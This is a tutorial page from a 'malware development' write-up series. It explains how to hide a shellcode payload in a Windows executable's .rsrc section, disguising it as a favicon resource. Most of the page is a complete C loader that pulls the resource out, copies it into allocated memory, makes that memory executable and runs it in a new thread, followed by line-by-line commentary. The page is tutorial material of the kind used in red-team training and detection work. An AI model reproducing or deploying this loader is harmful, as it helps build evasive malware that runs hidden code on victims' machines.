> For the complete documentation index, see [llms.txt](https://sayonara.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sayonara.gitbook.io/writeups/malware-developement/essentials/payload-storage/storing-payload-in-.rsrc-section.md).

# Storing Payload in .rsrc Section

## <mark style="color:red;">.rsrc</mark>

The .rsrc section is a special section in a Windows executable file that contains the resources used by the program. These resources can include icons, bitmaps, menus, dialog boxes, strings, and other data that is needed by the program at runtime.

When an executable is compiled, the resources are typically stored in a separate file called a resource file (.rc), which is then compiled into a binary format and added to the .rsrc section of the executable. This makes it possible for the program to access the resources at runtime, without having to read them from a separate file on disk.

When a program needs to access a resource, it typically uses the Win32 API functions FindResource, LoadResource, and LockResource to access the payload data from within the executable. The `FindResource` function searches for the resource in the .rsrc section, the `LoadResource` function loads the resource into memory, and the `LockResource` function returns a pointer to the resource data that you can then use to access the payload.

### <mark style="color:red;">Code :</mark>&#x20;

```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "resources.h"

int main(void) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
    	DWORD oldprotect = 0;
	HGLOBAL resHandle = NULL;
	HRSRC res;
	
	unsigned char * payload;
	unsigned int payload_len;
	
	// Extract payload from resources section
	res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
	resHandle = LoadResource(NULL, res);
	payload = (char *) LockResource(resHandle);
	payload_len = SizeofResource(NULL, res);
	
	// Allocate some memory buffer for payload
	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
	printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

	// Copy payload to new memory buffer
	RtlMoveMemory(exec_mem, payload, payload_len);
	
	// Make the buffer executable
	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

	// Launch the payload
	if ( rv != 0 ) {
			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
			WaitForSingleObject(th, -1);
	}

	return 0;
}

```

### <mark style="color:green;">Code Explanation :</mark>&#x20;

* <mark style="color:orange;">**HGLOBAL resHandle, HRSRC res :**</mark> resHandle and res are used to store the handle to a resource and `HGLOBAL` and `HRSRC` are data types defined in the Windows API for handling resource For example, `HGLOBAL` can hold the **handle** to a **loaded resource**, and `HRSRC` can hold the **handle** to a **resource being searched for**
* <mark style="color:orange;">**res = FindResource(NULL, MAKEINTRESOURCE(FAVICON\_ICO), RT\_RCDATA) :**</mark>  Uses the `FindResource` function to locate a resource within the executable. The NULL parameter indicates that the function should search for the resource in the current module. `MAKEINTRESOURCE(FAVICON_ICO)`is used to create a resource identifier based on the `FAVICON_ICO` value. `RT_RCDATA` stands for **"read-only data resource"** is the resource type, indicating that the resource is a user-defined data resource.

<div align="left"><figure><img src="/files/BKArrj4C0XLPu05Hlc4l" alt=""><figcaption></figcaption></figure></div>

* <mark style="color:orange;">**resHandle = LoadResource(NULL, res)**</mark> : Uses the `LoadResource` function to load the specified resource. It takes the `NULL` parameter to indicate the current module and the `res` handle obtained from the previous step. The result is stored in `resHandle`, which represents the loaded resource.
* <mark style="color:orange;">**payload = (char\*)LockResource(resHandle) :**</mark> Uses the `LockResource` function to obtain the address of the resource data. The `LockResource` function takes the `resHandle` obtained from `LoadResource` and returns a pointer to the resource data. It's cast to `(char*)` to match the type of `payload`.
* <mark style="color:orange;">**payload\_len = SizeofResource(NULL, res) :**</mark> Uses the `SizeofResource` function to determine the size (length) of the resource. It takes the NULL parameter to indicate the current module and the `res` handle obtained from `FindResource`. The resulting size is stored in `payload_len`.

the rest of the code is the same as the .text section code so you can check [here](/writeups/malware-developement/essentials/payload-storage/storing-payload-in-.text-section.md) for more explanation of the code
